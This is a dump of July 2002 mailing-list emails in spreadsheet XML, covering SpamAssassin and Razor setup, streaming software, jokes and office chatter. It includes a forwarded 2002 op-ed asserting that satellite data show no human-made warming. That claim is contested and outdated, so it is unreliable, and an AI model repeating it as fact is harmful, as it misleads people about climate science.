what's yours? - Joe the Angry Dwarf P.S. Ain't no dwarf. [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Jim Whitehead &lt;ejw@cse.ucsc.edu&gt;\nFrom: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nDate: Tue, 23 Jul 2002 18:39:57 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 18:39:57 -0700</t>
  </si>
  <si>
    <t>Jim Whitehead wrote:\n&gt; [URL]http://www.research.microsoft.com[/URL]\n\nLooks cute. For what it's worth I worked closely with a few\nof the people on the team. One was my officemate for years.\n\nUnfortunately there's no way I'm loading all the .NET stuff\non my machine. Not yet. And hopefully by the time it's all\nstable, I'll be running FreeBSD again on my laptop, and it will\nbe moot anyway.\n\n- Joe\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.research.microsoft.com http://xent.com</t>
  </si>
  <si>
    <t>To: Scott Henderson &lt;boyhowdy@cyberspace.org&gt;\nFrom: "Tabor J. Wells" &lt;razor-users@fsckit.net&gt;\nDate: Tue, 23 Jul 2002 18:16:02 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 18:16:02 -0400</t>
  </si>
  <si>
    <t>On Tue, Jul 23, 2002 at 06:06:05PM -0400, Scott Henderson  is thought to have said: &gt; Thanks, Tabor.  How do I install v1 over v2, and where does one &gt; get it?  (I don't see it at razor.sourceforge.net) It's there. Scroll down on the downloads page. However you might consider going the other way and installing SpamAssassin's 2.40 bleeding-edge code as Razor v2 has a lot of nice features over v1. --  -------------------------------------------------------------------- Tabor J. Wells                                razor-users@fsckit.net Fsck It!                 Just another victim of the ambient morality ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "Owen Byrne" &lt;owen@permafrost.net&gt;, &lt;FoRK@xent.com&gt;\nFrom: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;\nDate: Tue, 23 Jul 2002 18:10:35 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 18:10:35 -0700</t>
  </si>
  <si>
    <t>"Owen Byrne" &lt;owen@permafrost.net&gt;, &lt;FoRK@xent.com&gt;</t>
  </si>
  <si>
    <t>RE: [NYT] Real Source</t>
  </si>
  <si>
    <t>&gt; Well, just to take this thread off topic - does anyone know what's\n&gt; involved in serving streaming video? I assume that\n&gt;  the only practical alternatives are MS and Real, and that it's likely\n&gt; to cost some $$$ for the software.\n\nA quick Google search turns up:\n\n[URL]http://developer.apple.com[/URL]\nDarwin streaming media server\n\n[URL]http://mpeg4ip.sourceforge.net[/URL]\nMPEG4IP: Open Source, Open Standards, Open Streaming\n\nMPEG4IP provides an end-to-end system to explore MPEG-4 multimedia. The\npackage includes many existing open source packages and the "glue" to\nintegrate them together. This is a tool for streaming video and audio that\nis standards-oriented and free from proprietary protocols and extensions.\n\nProvided are an MPEG-4 AAC audio encoder, an MP3 encoder, two MPEG-4 video\nencoders, an MP4 file creator and hinter, an IETF standards-based streaming\nserver, and an MPEG-4 player that can both stream and playback from local\nfile.\n\nOur development is focused on the Linux platform, and has been ported to\nWindows, Solaris, FreeBSD, BSD/OS and Mac OS X, but it should be relatively\nstraight-forward to use on other platforms. Many of the included packages\nare multi-platform already.\n\n\nBoth sound interesting, and low $$.\n\n- Jim\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://developer.apple.com http://mpeg4ip.sourceforge.net http://xent.com</t>
  </si>
  <si>
    <t>To: "Tabor J. Wells" &lt;razor-users@fsckit.net&gt;\nFrom: Scott Henderson &lt;boyhowdy@cyberspace.org&gt;\nDate: Tue, 23 Jul 2002 18:06:05 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 18:06:05 -0400 (EDT)</t>
  </si>
  <si>
    <t>On Tue, 23 Jul 2002, Tabor J. Wells wrote:\n&gt;Razor/Client.pm is part of Razor v1. You've installed Razor v2.\n&gt;Spamassassin's current release only works with v1. Although IIRC\n&gt;the current CVS code works with v2.\n\nThanks, Tabor.  How do I install v1 over v2, and where does one\nget it?  (I don't see it at razor.sourceforge.net)\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Scott Henderson &lt;boyhowdy@cyberspace.org&gt;\nFrom: "Tabor J. Wells" &lt;razor-users@fsckit.net&gt;\nDate: Tue, 23 Jul 2002 17:59:22 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 17:59:22 -0400</t>
  </si>
  <si>
    <t>On Tue, Jul 23, 2002 at 05:28:33PM -0400, Scott Henderson  is thought to have said: &gt; What am I missing?  Thanks! Razor/Client.pm is part of Razor v1. You've installed Razor v2. Spamassassin's current release only works with v1. Although IIRC the current CVS code works with v2. Tabor --  -------------------------------------------------------------------- Tabor J. Wells                                razor-users@fsckit.net Fsck It!                 Just another victim of the ambient morality ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;fork@spamassassin.taint.org&gt;\nFrom: "Gordon Mohr" &lt;gojomo@usa.net&gt;\nDate: Tue, 23 Jul 2002 17:57:29 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 17:57:29 -0700</t>
  </si>
  <si>
    <t>"SpamAssassin Killed My Independence Day Party" With all the spam that gets through, I had no idea a filter was in effect at the FoRK listserv.  Turn it off! It not only risks silent false  positives, but suffers them in such a way that  individuals cannot adjust/detect/remedy them.  Also, anti-spam startups need end-users.  Centralized spam fighting takes food out of those coders' mouths! I still think self-add whitelists are underrated.  A FoRK whitelist would presumably start with all subscribers, and grow from there. Bouncing problem mail, in a way that humans can understand how to whitelist themselves for a resend, avoids  the problem of silent failures without opening the  door to lazy, forged-"from" spammers.  - Gordon ----- Original Message -----  From: "Rohit Khare"  To:  Sent: Tuesday, July 23, 2002 12:25 PM Subject: Re: HD/ID: High-Def Independence Day &gt; On Sunday, June 30, 2002, at 12:18 AM, Rohit Khare wrote: &gt; &gt; You're all invited to join me for a South Bay Hi-Def spectacle at my  &gt; &gt; apartment in Sunnyvale on the Fourth! &gt;  &gt; So here's the final report on the HD/ID party. As no less than TEN  &gt; forkers pointed out, the invitation, while sent on Sunday 6/30, was only  &gt; delivered ten days later on 7/9. &gt;  &gt; It got flagged as spam. &gt;  &gt; Yes, on a mailing list awash in crap -- and some it is even unsolicited  &gt; commercial email, heavens! -- our trusty mailman filters captured and  &gt; quarantined just two posts that week, one from me that was &gt; 100K (the  &gt; fat articles) and one that was bcc:d (the invite). &gt;  &gt; Now, it was a little difficult to recalibrate self-esteem, which as you  &gt; can imagine was proportional to the two-digit attendance  -- in binary! &gt;  &gt; According to the George Washington documentary, I almost had as much  &gt; alcohol on hand than he did -- Virginia tradition being to copiously  &gt; lubricate each voter. Election day was a public festival day, and it  &gt; cost poor George an average of SIXTY-FOUR shots of hard liquor PER VOTER  &gt; that day... &gt;  &gt; So, herewith is the prize for most appropriate flame my delayed invite  &gt; got: &gt;  &gt; &gt; I unfortunately will have had other plans and thus will &gt; &gt; not be able to have made it.  Yes. &gt; &gt; &gt; &gt; -faisal &gt;  &gt; One of our competitors added: &gt; &gt; Wow - I just got this now - I guess that was KnowLate! &gt;  &gt; And there is no prize for guessing which cold, dark forks emitted these  &gt; two plaints: &gt;  &gt;  From Whiny Dwarf: &gt; &gt; Fix your mail server! just a bit late! &gt;  &gt; And Angry Dwarf: &gt; &gt; God DAAAAAMMMMMNNNNN IIIIITTT! I didn't see your message until now!  &gt; &gt; Fuck! Fuck! Fuck! &gt; &gt; &gt; &gt; We would have been there if I had seen the message before. Kuso! (as  &gt; &gt; the Japanese would say). &gt; &gt; &gt; &gt; Fuck. &gt; &gt; Fuck. &gt; &gt; Fuck. &gt; &gt; Fuck. &gt; &gt; Fuck. &gt; &gt; Fuck. &gt;  &gt; Perhaps I should remind the latter gently that it was not in any way his  &gt; fault. The universe *was* out to get him! &gt;  &gt; And finally, here's an object lesson for all ye of little faith to learn  &gt; from my sins: &gt;  &gt; &gt; SpamAssassin rated it spam (barely). Gotta stop &gt; &gt; using those "words and phrases which indicate porn" :-) &gt;  &gt; Yes, boys and girls, Mr. Assassin, like Mr. Lott, gets very annoyed if  &gt; you call the Great American Shrine a... "boob tube" &gt;  &gt; :-) &gt;    Rohit &gt;  &gt; PS. This is the obscure footnote where I actually hide the bits in this  &gt; post. What we just encountered here is that an event-processing system  &gt; with a 10-day RTT cannot be used to reliably handle events more often  &gt; than once every 20 days. That's why I waited to reply. six bonus points  &gt; to anyone who can prove this hunch of mine. Hint: try analyzing the  &gt; problem in frequency-domain. &gt;  &gt; [URL]http://xent.com[/URL] [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Robert Harley &lt;harley@corton.inria.fr&gt;\nFrom: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nDate: Tue, 23 Jul 2002 17:47:35 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 17:47:35 -0700</t>
  </si>
  <si>
    <t>Robert Harley &lt;harley@corton.inria.fr&gt;</t>
  </si>
  <si>
    <t>Okay, here's a joke I *just* made up while I was driving my car at home:\n\nOne day a pirate walks into a bar with a steering wheel\n   attached to his crotch. So the bartender says to him,\n   "You know you have a steering wheel attached to your crotch?"\n\n    And the pirate says, "Aaar, its driving me nuts!"\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "FoRK" &lt;FoRK@xent.com&gt;\nFrom: "Jim Whitehead" &lt;ejw@cse.ucsc.edu&gt;\nDate: Tue, 23 Jul 2002 17:40:26 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 17:40:26 -0700</t>
  </si>
  <si>
    <t>SimPastry</t>
  </si>
  <si>
    <t>[URL]http://www.research.microsoft.com[/URL]\n\nPastry is a generic, scalable and efficient substrate for peer-to-peer\napplications. Pastry nodes form a decentralized, self-organizing and\nfault-tolerant overlay network within the Internet. Pastry provides\nefficient request routing, deterministic object location, and load balancing\nin an application-independent manner. Furthermore, Pastry provides\nmechanisms that support and facilitate application-specific object\nreplication, caching, and fault recovery.\n\n----\n\nYou can download a Pastry simulator off of this web site.\n\n- Jim\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: yyyy@netnoteinc.com\nFrom: Justin Mason &lt;yyyy@netnoteinc.com&gt;\nDate: Tue, 23 Jul 2002 17:34:10 +0100</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 17:34:10 +0100</t>
  </si>
  <si>
    <t>yyyy@netnoteinc.com</t>
  </si>
  <si>
    <t>send failed on enclosed draft</t>
  </si>
  <si>
    <t>post: illegal header line -- Date: post: re-format message and try again Message not delivered to anyone. ------- Unsent Draft To: mice@crackmice.com Subject: van Hoogstraten (fwd) Date: Tue, 23 Jul 2002 10:53:59 +0100 From: yyyy@spamassassin.taint.org Anyone see the program about this guy last night?  He's a cartoon character -- unbelievably inhuman. - --j. - ------- Forwarded Message Date:    Mon, 22 Jul 2002 14:14:22 +0100 From:    "Tim Chapman"  To:      zzzzteana@yahoogroups.com Subject: Re: [zzzzteana] van Hoogstraten verdict &gt;&gt; I was a bit disappointed that van Hoogstraten only got done for &gt;&gt; manslaughter , but then I read that the judge is considering giving him &gt;&gt; life anyway, A good time to savour again the classic Guardian interview from a couple of years ago - [URL]http://www.guardian.co.uk[/URL],3604,365743,00.html His tenants are 'filth'. People in council houses are 'worthless and lazy'. Ramblers are 'nosy perverts'. Nicholas van Hoogstraten, a man who once paid for a hand-grenade attack on a business rival, shows Emma Brockes around his Sussex palace and explains why he's so keen to keep the riff-raff away Friday September 8, 2000 ... On the way down from the roof, through the "workers' quarters" which Van Hoogstraten intends to fill with staff from Zimbabwe, he returns to the subject of peasants, expanding on the "worthless" and "lazy" majority who make up the council estates of this country. "You are playing up to your villainous image," I suggest. Van Hoogstraten looks momentarily embarrassed. "I'm not villainous," he mumbles. I ask if he regards the people who work for him in these derogatory terms, and he says no, because they work hard and hard labour is what distinguishes the "riff-raff" from the "elite". I ask him if being a person of quality is merely a matter of wealth. He says no, and refers to some of his wealthy neighbours, "old-moneyed bastards" whom he regards as being as primitive in their idleness as "those rat bags drawing social security." ... He was in the Bahamas when President John F Kennedy was shot, and amidst the public mourning, remembers being pleased. "I was glad," he says. "He was only in it for the ego trip." He claims similar feelings on hearing news of Diana's death, while returning from France on a ferry. "She made us look like fools," he says. "She made a mockery of the royal family." Van Hoogstraten's relationship with authority is riddled with contradictions. He says he hated Diana because she was thick, but when you point out that the rest of the royal family are pretty thick too, he says gloopily, "they are all we've got, so we have to respect them." He says he favours dictatorship as the best form of government, but complains that some of the officials he has dealt with in Mugabe's Zimbabwe are impossible because "the power has gone to their heads." (Mugabe himself is the most modest man he has ever met, he says, and he is friends with Ian Smith, who apart from the small matter of his hysterical racism, he finds charming). Margaret Thatcher is the only leader he has ever admired, because she made him feel "proud to be English". ... The 'van' is of course a late affectation - always an indication of a genuine dickhead. See also Mohamed 'al' Fayed. TimC ------- End of Unsent Draft</t>
  </si>
  <si>
    <t>To: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nFrom: Owen Byrne &lt;owen@permafrost.net&gt;\nDate: Tue, 23 Jul 2002 17:30:41 -0300</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 17:30:41 -0300</t>
  </si>
  <si>
    <t>Re: Just Ask the Experts</t>
  </si>
  <si>
    <t>R. A. Hettinga wrote:\n\n&gt;A little tidbit for those who still believe in science by opinion poll...\n&gt;\n&gt;Cheers,\n&gt;RAH\n&gt;  \n&gt;\n\nWas there any science in there? All I saw was more of the "myth of the \nliberal media." Every opinion supporting global warming was "the media", \nevery opinion against it was an "expert." A brief perusal of the rest of \nthe web site and I'm left wondering where the science\nis.\nAnd, to put on my extremist hat, every organization or scientist in \nthere was American. Big deal - a bunch of scientists being trotted out \nto support government and industrial policy that is the ultimate source \nof their livelihood and research money. If the government changes their \nmind on Kyoto, they'll trot out another group of tame scientists. And \nall the American papers will switch back to warning us about climate change.\n\nOwen\n\n\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Razor-Users &lt;razor-users@example.sourceforge.net&gt;\nFrom: Scott Henderson &lt;boyhowdy@cyberspace.org&gt;\nDate: Tue, 23 Jul 2002 17:28:33 -0400 (EDT)</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 17:28:33 -0400 (EDT)</t>
  </si>
  <si>
    <t>Razor-Users &lt;razor-users@example.sourceforge.net&gt;</t>
  </si>
  <si>
    <t>[Razor-users] can't find Razor/Client.pm</t>
  </si>
  <si>
    <t>Apologies if this has been answered before on this list.  I can't\nfind a way to search the archives.  I did my best to scan through\nthe archive messages, but can't find my answer.  Please advise if\nthere is a search engine somewhere, Thanks. \n\nI'm trying to set up a smtp relay mail server using postfix,\nSpamassassin, and amavisd-new.  (no local delivery, just an\nanti-spam filter box)  I have installed razor-agents-sdk-2.02 and\nrazor-agents-2.125 (in that order) on a RH 7.3 box for this.  But\nwhen I try to load amavisd from the command line (as root), I get\nerrors with:  \n\nCan't locate Razor/Client.pm in @INC.  But the machine does have\na Client.pm on it, in fact, several, at:\n\n/usr/lib/perl5/5.6.1/Client.pm\n/usr/lib/perl5/site_perl/5.6.1/WAIT/Client.pm\n/usr/lib/perl5/site_perl/5.6.1/Client.pm\n/usr/lib/perl5/vendor_perl/5.6.1/Frontier/Client.pm.rawcall\n/usr/lib/perl5/vendor_perl/5.6.1/Frontier/Client.pm\n\nWhat am I missing?  Thanks!\n\nScott\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: JTS - MCDLXXXVI &lt;jts1486@theworld.com&gt;\nDate: Tue, 23 Jul 2002 16:42:33 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 16:42:33 -0400</t>
  </si>
  <si>
    <t>JTS - MCDLXXXVI &lt;jts1486@theworld.com&gt;</t>
  </si>
  <si>
    <t>Re: NYTimes.com Article: Why We're So Nice: We're Wired to Cooperate</t>
  </si>
  <si>
    <t>From: Win Treese  &gt; And Owen replied: &gt; &gt; Well, IMNHO, its because companies do not reward knowledge sharers. &gt; &gt; I don't work in this area, but I have a suspicion that many people &gt; suspect projects for "knowledge management" and "knowledge sharing" as &gt; attempts to eliminate their jobs, or at least their importance. If "the &gt; organization" knows all the things I know, why does it need me? I agree wholeheartedly.  It is easier to sit on knowledge than to continually acquire more on the frontiers. &gt; This should actually be easy to test experimentally: compare the results &gt; of having someone call up and say, "Can you show us how to do X for this &gt; project we're working on?" with those of having someone summoned by a &gt; knowledge management project to explain how to do X for the knowledge &gt; archives. This is in fact very true.  People hate doing this for several reasons in my experience: 1) "Software changes.   Why waste time writing a FAQ now that will be out of date at the next release in 3 months?" 2) "This knowledge is specialized.  Only 4 people need to know this, and they already do.  If anyone else needs to know it they know who they can call." The same engineers who give these excuses will spend eternities on the phone discussing this arcana and sharing the knowledge with anyone who has the patience to ask. The strongest contributors freely share everything they know whenever asked (or whenever they see the need for the information in the company) and who at the same time continue to generate new knowledge. Personal evaluation: my worth comes slightly lower on the scale in that I synthesize the knowledge from various personal sharing exercises into usable documents and messages for the company to employ.  This would seem like a marketing exercise except that Marketing is useless.   Useful knowledge sharing comes (IMHO) from engineering and sales. 	JTS [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "'harley@argote.ch'" &lt;harley@argote.ch&gt;, fork@spamassassin.taint.org\nFrom: Sherry Listgarten &lt;sherry@timesten.com&gt;\nDate: Tue, 23 Jul 2002 16:16:34 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 16:16:34 -0700</t>
  </si>
  <si>
    <t>"'harley@argote.ch'" &lt;harley@argote.ch&gt;, fork@spamassassin.taint.org</t>
  </si>
  <si>
    <t>RE: My brain hurts</t>
  </si>
  <si>
    <t>&gt; Someone tell me a joke, or email me a beer or something...\n\nA man is out driving in the country, and drives past a farm with the most\nbeautiful pig -- fat, healthy, pink, clean, etc. Just a lovely pig. He gets\nout to admire the pig, and notices that it has a wooden leg! The farmer\ncomes by and says "Howdie", and the passerby says "I was just stopping to\nadmire your pig. What a lovely pig. But what's with the woo..." The farmer\ninterrupts "Oh, yes, this is the most wonderful pig! When our house had a\nhuge fire a few years back, and was burning down, this pig came in and\nsquealed and made sure we all woke up and got out. She really saved our\nlives!" "My", says the passerby, "what a great story. But what's with the\nwooden l..?" The farmer jumps in again: "And then, when my youngest was out\nin the street playing just a few months ago, and a big tractor trailer came\nbarrelling down on her, this pig jumped right in and pushed her out of the\nway, getting them both to the side of the road before the truck came by!"\n"I'll say, that does show great bravery," said the passerby. "But, if you\ndon't mind my asking, what *is* the deal with the wooden leg?" The farmer\npaused. "Well," he said, "a pig like that -- you don't want to eat it all at\nonce!"\n\n-- Sherry.\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Luis Villa &lt;louie@ximian.com&gt;\nFrom: Bill Humphries &lt;bill@whump.com&gt;\nDate: Tue, 23 Jul 2002 16:10:16 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 16:10:16 -0700</t>
  </si>
  <si>
    <t>On Tuesday, July 23, 2002, at 03:49 PM, Luis Villa wrote: &gt; It's quite a bit more than natural selection; the times had a &gt; fascinating article a few months back (possibly posted as bits here) &gt; that note that one Holstein bull who died in the 70s is paternally &gt; related to something like 40% of the world's cattle. That's way, way &gt; more than natural selection, and (given the difficulty and expense of &gt; isolating specific genes for size, industrial-living-ness, etc.) more &gt; expansive than raw gene manipulation will be for some time. [URL]http://www.absglobal.com[/URL] They know bull semen, and the burger you ate at lunch may have had its  sire's contribution to its genetics purchased through them. My ex-wife worked in their lab for a year while I was in gradual school.  We had boxes of masking tape from ABS pre-printed with the names and  serial numbers of 'decomissioned' bulls. They are also known for the hideous puns on their sign just outside of  Madison on I90/94. But the puns haven't been any good since the secretary  who first wrote them retired. ---- Bill Humphries  [URL]http://www.whump.com[/URL] [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.absglobal.com http://www.whump.com http://xent.com</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Ian Andrew Bell &lt;hello@ianbell.com&gt;\nDate: Tue, 23 Jul 2002 16:08:53 -0700</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 16:08:53 -0700</t>
  </si>
  <si>
    <t>Ian Andrew Bell &lt;hello@ianbell.com&gt;</t>
  </si>
  <si>
    <t>Re: My Brain Hurts</t>
  </si>
  <si>
    <t>Begin forwarded message: &gt; From: Ian Andrew Bell  &gt; Date: Tue Jul 23, 2002  02:02:20 PM US/Pacific &gt; To: foib@ianbell.com &gt; Subject: @F: [GENERAL] Evil Polling &gt; &gt; I know you're sitting there asking yourself, "who is the most evil  &gt; person on the planet?".  Wonder no more, your local search engine  &gt; will tell you.  Just search for the phrase +" is EVIL" and  &gt; let the internet tell you the real truth.  I used two engines to  &gt; verify accuracy. &gt; &gt; Phrase: 							Google	Hotbot &gt; +"Bert is EVIL"						14700	5100 &gt; +"Microsoft is EVIL"				1730	1600 &gt; +"Saddam Hussein is EVIL"			98		100 &gt; +"Ernie is EVIL"					75		69 &gt; +"Osama Bin Laden is EVIL"			61		72 &gt; +"Janet Reno is EVIL"				44		19 &gt; +"George Bush is EVIL"				39		17 &gt; +"Canada is EVIL"					19		82 &gt; +"George W. Bush is EVIL"			22		21 &gt; +"Tony Blair is EVIL"				11		12 &gt; +"Adolf Hitler is EVIL"				1		23 &gt; +"Dick Cheney is EVIL"				4		6 &gt; +"Pat Buchanan is EVIL"				3		6 &gt; +"Ghandi is EVIL"					2		5 &gt; +"Bart Simpson is EVIL"				0		1 &gt; +"Geoff Gachallan is EVIL"			0		0 &gt; &gt; &gt; -Ian. &gt; &gt; &gt; ----------- &gt; FoIB mailing list -- Bits, Analysis, Digital Group Therapy &gt; [URL]http://foib.ianbell.com[/URL] [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://foib.ianbell.com http://xent.com</t>
  </si>
  <si>
    <t>To: Win Treese &lt;treese@acm.org&gt;, fork@spamassassin.taint.org\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Tue, 23 Jul 2002 15:20:20 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 15:20:20 -0400</t>
  </si>
  <si>
    <t>Win Treese &lt;treese@acm.org&gt;, fork@spamassassin.taint.org</t>
  </si>
  <si>
    <t>At 2:55 PM -0400 on 7/23/02, Win Treese wrote: &gt; This should actually be easy to test experimentally: compare the results &gt; of having someone call up and say, "Can you show us how to do X for this &gt; project we're working on?" with those of having someone summoned by a &gt; knowledge management project to explain how to do X for the knowledge &gt; archives. About the only way I've heard of something like this working was back in the Eighties, when management poster-child QuadGraphics used to have the maxim "you can't get promoted unless you teach someone your job". That might do the trick, though I don't know what happened to QuadGraphics... Cheers, RAH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URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;, fork@spamassassin.taint.org\nFrom: "R. A. Hettinga" &lt;rah@shipwright.com&gt;\nDate: Tue, 23 Jul 2002 15:05:50 -0400</t>
  </si>
  <si>
    <t>Tue, 23 Jul 2002 15:05:50 -0400</t>
  </si>
  <si>
    <t>Just Ask the Experts</t>
  </si>
  <si>
    <t>A little tidbit for those who still believe in science by opinion poll... Cheers, RAH [URL]http://www.techcentralstation.com[/URL] Just Ask the Experts By Sallie Baliunas and Willie Soon 07/23/2002 In 2001 the National Science Foundation surveyed 1,500 people nationwide and found that 77% believed that "increased carbon dioxide and other gases released into the atmosphere will, if unchecked, lead to global warming ..." Yet half of those polled believed that humans and dinosaurs co-existed on Earth, despite the scientific fact that the dinosaurs went extinct tens of millions of years before the earliest hominids appeared. Worse, only 22% of the respondents understood what a molecule - for example, carbon dioxide - is. As in the case of the belief by many that dinosaurs and early humans co-existed, public opinion does not change the actual facts about the material world. Such a poll measures nothing more than the degree of public ignorance about scientific matters. Most people get news stories about science and technology developments from television. And after more than a decade of being fed what-if stories about global warming from human activities, no wonder most people "believe" that global warming "will" occur. However, on the anxiety scale, only 33% "worry a great deal" about global warming, a worry that ranks at 12 out of 13 environmental concerns. The top environmental fear, shared by 64% of those polled, was polluted drinking water. So What Do We Know? Concerning the latest understanding on human-made global warming, here are three points we know from the science:    1. The surface record of temperature from thermometers show widespread warming in the 20th century compared to the 19th. There was one period of warming early in the 20th century, the second after the 1970s. Ecosystems have responded to this widespread warmth, not seen since ca. 800 - 1200 C.E.       But the cause of global surface warming cannot be associated with human activity without additional information. Some media reports point to ecosystem responses of 20th century warmth (e.g., mountain glacier retreat) and unjustifiably claim the responses owe to man-made causes. But mountain glaciers receded during the past period of warmth around 1,000 years ago, and advanced during the unusual cold of the Little Ice Age (ca. 1300 - 1900 C.E.). Both those climate shifts occurred naturally, before the increased concentration of human-made greenhouse gases in the air.     # All computer simulations of climate say that in order to conclude that the surface global warming trend is human caused, the surface warmth must be accompanied by an equal or larger warming trend in the air from one to five miles in height. Measurements made by satellites and verified from weather balloons show no meaningful human-made warming trend over the last two or even four decades. Thus, the recent warming trend in the surface temperature record cannot be caused by the increase of human-made greenhouse gases in the air.     # The computer simulations are not reliable as tools for explaining past climate or making projections for future trends. Future Shock: The Scenarios When it comes to future scenarios, consider what the experts actually say about potential climate change. The United Nations Intergovernmental Panel on Climate Change writes in its Special Report on Emissions Scenarios (2000), "Scenarios are images of the future or alternative futures. They are neither predictions nor forecasts." Further, "The possibility that any single emissions path will occur as described in the scenario is highly uncertain," and finally, "No judgement is offered in this Report as to the preference for any of the scenarios and they are not assigned probabilities of occurrence, neither must they be interpreted as policy recommendations." Forecasting future societal conditions and energy use often amount to little more than unconvincing guesses. Jesse Ausebel at Rockefeller University in April 2002 critiqued the U.N. IPCC's " ... 40 energy scenarios, with decarbonization, or carbonization, sloping every which way and no probabilities attached. ... It is a confession that collectively they know nothing, that no science underlies their craft, and that politics strongly bias their projections." Nonetheless, such a guess about the world's energy future forms the first step in making a 100-year prediction of global warming. That first uncertain forecast - future energy use - used as input in the climate simulation surely compounds the uncertainty in the next step, the climate forecast. Inability to predict the future should not be surprising. The climate simulations upon which predictions are based yield unreliable results because, as outlined above, the results are incompatible with measurements of how the climate has changed in the last few decades. Complete Speculation On May 24, 1994, Richard Lindzen, the Alfred P. Sloan Professor of Meteorology at MIT, testified to the Senate Committee on Energy and Natural Resources, "The claims about catastrophic consequences of significant global warming, should it occur at all, are almost completely speculative. Not only are they without any theoretical foundations, but they frequently involved assuming the opposite of what appears to happen." Despite years of solid work by climate specialists, the output of computer simulations remains undependable, owing to the extraordinary complexity of the natural world. Thus, on May 1, 2001 Lindzen testified to the Senate Commerce Committee about the long-standing inability of computer simulations to deliver results that resemble reality, even in the cases where good measurements are available: "For example, there is widespread agreement [among climate scientists] ... that large computer climate models are unable to even simulate major features of past climate such as the 100 thousand year cycles of ice ages that have dominated climate for the past 700 thousand years, and the very warm climates of the Miocene [23 to 5 million years ago], Eocene [57 to 35 million years ago], and Cretaceous [146 to 65 million years ago]. Neither do they do well at accounting for shorter period and less dramatic phenomena like El Ninos, quasi-biennial oscillations, or intraseasonal oscillations - all of which are well documented in the data, and important contributors to natural variability." Lindzen explained the failure of computer simulations simply in May 2000: "The point I am making is that it is a fallacious assumption that the models have everything in them, and will display it, and somehow the rest is just technical uncertainty. There are things they literally don't have." This punctuates the popular notion that averaging output from computer results will somehow, miraculously, give a scientifically appropriate result. Think Locally Now, on top of the unreliable forecasts of global warming -- which rest on "highly uncertain" forecasts of future economic and social conditions and un-validated climate simulations -- come the forecasts of local impacts, in order to make the case for relevancy to people. Increased storminess is one prediction of the outcome of human-made global warming found in the popular media, which would be where most people learn about the issue. The idea that storminess increases with human-made global warming defies expert opinion. David Legates, an expert hydrology researcher, testified in the Senate Committee on Environment and Public Works on March 13, 2002: "Ascertaining anthropogenic changes to these extreme weather events is nearly impossible. Climate models cannot even begin to simulate storm-scale systems, let alone model the full range of year-to-year variability... Clearly, claims that anthropogenic global warming will lead to more occurrences of droughts, floods, and storms are wildly exaggerated." The U.N. IPCC Third Assessment Report concurs, "[T]here is currently insufficient information to assess recent trends, and climate models currently lack the spatial detail required to make confident projections. For example, very small-scale phenomena, such as thunderstorms, tornadoes, hail and lightning, are not simulated in climate models (Summary for Policymakers, p. 15)." A group of extremely relevant experts, the American Association of State Climatologists, recently summarized the state of climate simulations: "Climate prediction is complex with many uncertainties ... For time scales of a decade or more, understanding the empirical accuracy of such predictions - called "verification" - is simply impossible, since we have to wait a decade or longer to assess the accuracy of the forecasts. ... climate predictions have not demonstrated skill in projecting future variability and changes in such important climate conditions as growing season, drought, flood-producing rainfall, heat waves, tropical cyclones and winter storms. These are the type of events that have a more significant impact on society than annual average global temperature trends." On the facts of human-made global warming, should one believe television or the 